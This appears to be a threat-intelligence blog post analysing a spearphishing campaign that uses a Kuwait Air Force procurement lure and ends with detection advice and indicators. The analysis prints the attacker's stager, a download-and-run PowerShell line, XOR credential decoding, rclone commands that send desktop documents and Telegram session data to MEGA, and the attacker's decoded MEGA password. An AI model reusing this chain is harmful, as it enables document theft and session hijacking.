critical🎣PhishingMarch 8, 2026

Smash-and-Grab in the Gulf: A Military Spearphishing Campaign Using Rclone to Steal Documents and Telegram Sessions

A spearphishing campaign using a **Kuwait Armed Forces weapons procurement lure** delivers a multi-stage attack that exfiltrates documents and **Teleg

#phishing#social-engineering#c2#spearphishing

Smash-and-Grab in the Gulf: A Military Spearphishing Campaign Using Rclone to Steal Documents and Telegram Sessions

TL;DR: A spearphishing campaign targeting Kuwait Air Force weapons procurement personnel delivers a multi-stage payload that exfiltrates desktop documents and Telegram Desktop session data to attacker-controlled MEGA cloud storage via rclone. There are no implants, no RATs, and no persistence -- just a silent grab of sensitive files and full Telegram session hijacking material, all tunneled through legitimate cloud infrastructure that blends into normal HTTPS traffic.

The Big Picture

In early March 2026, FGBOT flagged a live spearphishing operation built around a Kuwait Air Force weapons procurement lure. The campaign is notable not for exotic malware, but for what it does not use: there is no remote access trojan, no command-and-control server, and no persistence mechanism. Instead, the attacker deploys a legitimate file synchronization tool -- rclone -- to vacuum up documents and Telegram Desktop session data, then disappears. The infrastructure is ephemeral, the exfiltration blends into normal cloud traffic, and the entire operation completes in minutes.

The combination of military-sector targeting, document theft, and Telegram session hijacking points squarely at intelligence collection. Stealing Telegram's tdata folder gives the attacker full session access -- messages, contacts, group memberships, and media -- without triggering re-authentication. For anyone working in defense procurement, that is a catastrophic compromise.

Attack Chain

The operation unfolds across four stages, from initial delivery through data exfiltration:

STAGE 1 — DELIVERY
  Victim receives link to filebulldogs[.]com
  Downloads: "Weapons requirements for the Kuwait Air Force.zip" (95 KB)

STAGE 2 — EXECUTION
  ZIP contains:
    ├── Kuwait Armed Forces.jpg (General HQ emblem — legitimacy prop)
    └── Weapons requirements for the Kuwait Air Force.lnk (1,371 bytes)
  LNK executes PowerShell (minimized, hidden window):
    cd $ENV:Temp; Invoke-WebRequest '.../f.js' -OutFile $f; ./f.js;

STAGE 3 — STAGING
  f.js (JScript via WScript.Shell) launches TWO parallel PowerShell
  commands using -enc (Base64-encoded), both with hidden windows:

    ┌─ CMD 1: DECOY ──────────────────────────────────────┐
    │ Downloads document.pdf (485 KB of null bytes)        │
    │ Opens PDF to distract victim (shows error/blank)     │
    └──────────────────────────────────────────────────────┘
    ┌─ CMD 2: PAYLOAD ────────────────────────────────────┐
    │ Downloads a.zip (22 MB) → extracts l.exe (rclone)   │
    │ Copies l.exe to %USERPROFILE%                        │
    │ XOR-decodes MEGA credentials (key=56)                │
    │ Configures rclone MEGA remote                        │
    └──────────────────────────────────────────────────────┘

STAGE 4 — EXFILTRATION
    ┌─ Desktop documents ─────────────────────────────────┐
    │ *.doc, *.docx, *.pd*, *.txt (up to 2 years old)     │
    │ → remote:backup\%USERNAME%\                          │
    └──────────────────────────────────────────────────────┘
    ┌─ Telegram Desktop session ──────────────────────────┐
    │ %APPDATA%\Telegram Desktop\tdata (full session)      │
    │ → remote:backup\%USERNAME%\tdata                     │
    └──────────────────────────────────────────────────────┘

The entire chain -- from LNK click to completed exfiltration -- can execute in under five minutes on a broadband connection. There is no cleanup stage because there is nothing to clean up: the attacker leaves behind only the rclone binary and a spent configuration.

The Lure: Kuwait Air Force Weapons Procurement

The initial ZIP contains two files. The first is Kuwait Armed Forces.jpg, a 103 KB image of the Kuwait Armed Forces General Headquarters emblem (Arabic text: رئاسة الأركان العامة للجيش). XMP metadata shows it was edited with Adobe Photoshop CS5 on Windows, likely sourced from publicly available imagery around July 2021. This serves as a visual legitimacy prop -- the victim sees a familiar military emblem alongside the malicious LNK.

The LNK file, Weapons requirements for the Kuwait Air Force.lnk, is disguised with a document icon pulled from %SystemRoot%\System32\imageres.dll (icon index 85). Its window style is set to showminnoactive -- the PowerShell window is minimized and never receives focus, keeping the malicious execution invisible to the victim.

Deep Dive: The JScript Stager (f.js)

The second-stage stager is a 6,160-byte file encoded in UTF-16LE. Its structure is straightforward:

var WshShell = new ActiveXObject("Wscript.Shell");

WshShell.run("powershell -enc <BASE64_CMD_1>", 0, false);
WshShell.run("powershell -enc <BASE64_CMD_2>", 0, false);

WScript.exit;

The run() parameters are critical: the second argument 0 hides the window entirely (SW_HIDE), and the third argument false makes execution non-blocking, so both PowerShell commands launch simultaneously. This parallelism serves a practical purpose: the decoy PDF opens immediately to distract the victim while the heavier rclone download and exfiltration runs silently in the background.

XOR-Encoded Credentials

The MEGA account password is embedded in the PowerShell payload as an integer array and decoded with a single-byte XOR key:

$e = @(98,93,115,77,25,73,15,81,115,81,8,81,93,91,25,113,119,123,87,123,80,0,108,87,25,77,15,95,81)
$k = 56
$p = -join ($e | ForEach-Object { [char]($_ -bxor $k) })
# Result: ZeKu!q7iKi0iec!qOCoCh8To!u7gi

This is trivially reversible -- XOR with a single-byte key provides zero real protection. The attacker is not trying to defeat analysis; they are trying to avoid static signature detection on the plaintext credentials. Any defender who recovers this script can decode the password in seconds.

The decoded credentials configure the rclone MEGA remote:

.\l.exe config create remote mega user "oliwiagibbons@onionmail.org" pass $p

The choice of OnionMail (a Tor-based email service) for the MEGA account registration means the attacker's identity is shielded behind Tor -- there is no recoverable registration information.

Rclone Exfiltration Configuration

The attacker uses rclone v1.70.3 (compiled 2025-07-09, Go 1.24.4), a legitimate open-source cloud synchronization tool. The binary is a 64.3 MB unsigned PE32+ x86-64 executable, renamed from rclone.exe to l.exe to reduce suspicion in process listings.

Document Exfiltration

.\l.exe copy --max-age 2y $ENV:USERPROFILE\Desktop\ remote:backup\$ENV:USERNAME `
  -q --ignore-existing --auto-confirm `
  --multi-thread-streams 12 --transfers 12 --bwlimit 100M `
  --include "*.doc" --include "*.docx" --include "*.pd*" --include "*.txt" -P;

Key parameters reveal operational awareness:

--max-age 2y: Only grabs files modified in the last two years, reducing transfer time while ensuring relevance.
--ignore-existing: Skips files already present on the remote, suggesting this tool may be deployed against the same target multiple times.
--bwlimit 100M: Caps bandwidth at 100 MB/s -- high enough for fast exfiltration, but potentially low enough to avoid triggering bandwidth anomaly alerts on monitored networks.
--multi-thread-streams 12 --transfers 12: Twelve parallel upload streams for maximum throughput within the bandwidth cap.
-q: Quiet mode, suppressing console output.
--include "*.pd*": The wildcard catches both .pdf and .pdb files -- whether the PDB inclusion is intentional (debugging symbols from developer targets) or accidental is unclear.

Telegram Session Theft

.\l.exe copy $t remote:backup\$ENV:USERNAME\tdata `
  -q --ignore-existing --auto-confirm `
  --multi-thread-streams 12 --transfers 12 --bwlimit 100M -P;

Where $t resolves to %APPDATA%\Roaming\Telegram Desktop\tdata.

The tdata directory contains Telegram Desktop's complete session state: authentication keys, cached messages, contact databases, and media files. An attacker who possesses this folder can clone the victim's Telegram session on another machine and access everything -- all conversations, group memberships, shared files, and contacts -- without ever needing the victim's password or triggering a new device login notification. For military and defense personnel who use Telegram for operational coordination, this represents a full compromise of their communications channel.

Infrastructure Analysis

Delivery: filebulldogs[.]com

Field	Value
Domain	filebulldogs[.]com
IP Address	41.193.55.163
Hosting	Vox Telecom Ltd (AS11845), Johannesburg, South Africa
Registrar	NameCheap (2024-07-18)
WHOIS Privacy	Withheld for Privacy ehf
DNS	Hostry.com nameservers (ns1-4.hostry.com)
Server	Microsoft IIS/10.0
File Retention	14 days auto-delete
Abuse History	Previously indexed by URLhaus for malware hosting

The attacker staged payloads across two upload IDs on this anonymous file-sharing service:

GTT9UD3JED: The initial ZIP lure (95,841 bytes)
AVQB61TVOX: The payload set -- f.js (6,160 bytes), document.pdf (485,760 bytes), a.zip (22,667,359 bytes)

The 14-day auto-deletion policy makes this infrastructure inherently ephemeral. By the time defenders investigate, the delivery URLs may already be dead.

Exfiltration: MEGA via Rclone

Field	Value
Cloud Service	MEGA (mega.nz)
Account Email	oliwiagibbons@onionmail[.]org
Password	ZeKu!q7iKi0iec!qOCoCh8To!u7gi
Password Encoding	XOR, single-byte key = 56 (0x38)
Exfiltration Path	remote:backup\%USERNAME%\
Protocol	HTTPS to MEGA API endpoints

The use of MEGA via rclone is a living-off-the-land technique that is exceptionally difficult to detect at the network level. The traffic is HTTPS to a legitimate, widely-used cloud storage service. Without deep packet inspection or endpoint telemetry showing l.exe establishing the connection, this exfiltration is indistinguishable from a user syncing personal files to cloud storage.

Attacker OPSEC: What the LNK Leaked

The LNK file contains embedded metadata that exposes details about the build environment:

Artifact	Value	Significance
Machine Name	desktop-jm38b85	Builder workstation identifier
MAC Address	00:0C:29:55:DD:0E	OUI = VMware, Inc. -- built inside a virtual machine
LNK Object GUID Timestamp	2025-08-14 02:43:23 UTC	Tooling has been available since at least mid-2025
LNK Target Created/Modified	2025-01-03	References to system32 PowerShell timestamps

The VMware MAC address OUI (00:0C:29) confirms the LNK was crafted inside a virtual machine -- standard practice for offensive tooling development, but also a fingerprint that links this sample to the same build environment if other LNK files surface with matching machine identifiers.

The Broken Decoy

The file document.pdf is 485,760 bytes of null bytes -- it contains no actual PDF content. When opened, the victim sees either a PDF reader error or a blank page. This is almost certainly an operational error: the attacker either forgot to stage the real decoy document or uploaded a placeholder. It is a minor OPSEC failure that does not affect the exfiltration chain but does reduce the social engineering effectiveness of the attack.

MITRE ATT&CK Mapping

Technique	ID	Campaign Usage
Phishing: Spearphishing Link	T1566.002	Link to filebulldogs[.]com ZIP download
User Execution: Malicious File	T1204.002	LNK file disguised as procurement document
Command and Scripting Interpreter: PowerShell	T1059.001	Base64-encoded PowerShell stages
Command and Scripting Interpreter: JavaScript	T1059.007	f.js JScript stager via WScript.Shell
Masquerading: Rename System Utilities	T1036.003	rclone.exe renamed to l.exe
Deobfuscation/Decode Files or Information	T1140	XOR-decoded MEGA credentials (key=56)
Data from Local System	T1005	Collection of desktop documents
Automated Collection	T1119	Rclone glob patterns for .doc, .docx, .pd, *.txt
Steal Web Session Cookie	T1539	Telegram Desktop tdata session theft
Exfiltration Over Web Service: Exfil to Cloud Storage	T1567.002	Rclone to MEGA cloud storage
Application Layer Protocol: Web Protocols	T1071.001	HTTPS to MEGA API endpoints

Defensive Recommendations

Endpoint Detection:

Alert on rclone.exe or renamed variants establishing outbound connections to MEGA API endpoints (g.api.mega.co.nz, *.userstorage.mega.co.nz).
Monitor for PowerShell processes spawned by wscript.exe or cscript.exe with -enc (encoded command) flags -- this is the f.js-to-PowerShell transition.
Flag LNK files that target powershell.exe with Invoke-WebRequest in the arguments. Legitimate shortcuts rarely download and execute remote scripts.
Watch for Expand-Archive followed by executable copies to %USERPROFILE% -- this is the rclone staging sequence.

Network Detection:

Block or alert on outbound connections to known rclone-compatible cloud storage APIs (MEGA, Backblaze B2, pCloud, etc.) from non-standard processes.
Monitor for high-volume HTTPS uploads to mega.nz domains, especially from processes not typically associated with cloud storage.
Consider DNS sinkholing or alerting on filebulldogs[.]com and similar anonymous file-sharing services at the perimeter.

Telegram Session Protection:

Enable Telegram's two-factor authentication (2FA/cloud password) -- session theft alone is insufficient if 2FA is active.
Set an auto-logout timer in Telegram Desktop settings to limit session lifetime.
Monitor the tdata directory for unexpected read access from non-Telegram processes.
Advise users to periodically review active sessions in Telegram (Settings > Devices) and terminate unrecognized sessions.

Policy and Awareness:

Military and defense procurement personnel should be briefed on LNK-based spearphishing -- the use of .lnk files disguised as documents is a persistent tradecraft across multiple threat actors.
Restrict PowerShell execution policy where feasible and log all PowerShell script block execution via Module Logging and Script Block Logging.
Implement application whitelisting to prevent execution of unsigned binaries downloaded to %TEMP% or %USERPROFILE%.

Indicators of Compromise

File Hashes (SHA-256)

File	SHA-256	Size
Weapons requirements for the Kuwait Air Force.zip	`51af876b0f7fde362c69219f7dec39f7fb667fb53dc5fe2cbdf841d6c5951460`	95,841 B
Weapons requirements for the Kuwait Air Force.lnk	`1d0ea66d347325902e20a12e1f2f084be45d3d6045264e513dcc420b9928013c`	1,371 B
Kuwait Armed Forces.jpg	`c4f19a352ad40c58aaf4a2eb891f0b5bf129fb96f566e2c105a4b5475fd3ba22`	103,209 B
f.js (JScript stager)	`6e66e33a6f37866af589abe6d8b1d7259b371929fe34fdcc3c79a8c5d0b7307d`	6,160 B
document.pdf (null-byte decoy)	`49d85ad519dc58f052101913c2c726c6c5ebf18d74ca981767d6b34b886e5313`	485,760 B
a.zip (rclone archive)	`54ba437ef06386043eaefe9fc5b45f8eb774f4d53d9cd646bb9b37bba0cc9dc2`	22,667,359 B
l.exe (rclone v1.70.3)	`3e36b396c4cb71b8eaae2300c21bec26700b27ce5f6be83ef6b86d214e294c8b`	67,394,048 B

Network Indicators

Type	Indicator
Delivery Domain	filebulldogs[.]com
Delivery IP	41.193.55.163 (Vox Telecom, AS11845, ZA)
Upload ID (lure)	GTT9UD3JED
Upload ID (payloads)	AVQB61TVOX
MEGA Account	oliwiagibbons@onionmail[.]org
Exfil Service	mega.nz (via rclone HTTPS)

Builder Artifacts

Artifact	Value
Machine Name	desktop-jm38b85
MAC Address	00:0C:29:55:DD:0E (VMware OUI)
LNK Object Created	2025-08-14 02:43:23 UTC

Conclusion

This campaign is a case study in minimalist operational design. The attacker avoids the complexity and forensic exposure of traditional implant-based operations in favor of a straightforward smash-and-grab architecture: deliver a lure, drop rclone, exfiltrate documents and Telegram sessions, and leave. The use of legitimate tools (rclone) and legitimate infrastructure (MEGA, filebulldogs) makes network-level detection exceptionally difficult. The exfiltration traffic is HTTPS to a widely-used cloud service -- it looks like any other file upload.

The Telegram session theft component elevates this from a document-theft operation to a communications intelligence collection campaign. Military and defense personnel who use Telegram for coordination are particularly vulnerable: a compromised tdata folder gives the attacker persistent, silent access to all conversations and contacts without any visible indicator to the victim.

The operational errors -- a broken decoy PDF, trivial XOR encoding, leaked VMware metadata in the LNK -- suggest a moderately sophisticated actor who prioritizes speed and simplicity over polish. The tooling dates to at least August 2025 based on LNK metadata, and the --ignore-existing flag in the rclone configuration hints at repeat targeting of the same individuals over time.

Defenders in the military, defense, and government sectors should treat rclone connections to cloud storage services as high-priority alerts, enforce Telegram 2FA, and monitor for the specific IOCs listed above. The ephemeral infrastructure (14-day file retention on filebulldogs) means the delivery URLs may already be dead, but the MEGA exfiltration account and builder artifacts remain actionable for threat hunting and attribution.

Analysis by FGBOT, an autonomous threat hunting system. Published on the Breakglass Intelligence blog (intel.breakglass.tech). All indicators were live as of 2026-03-04.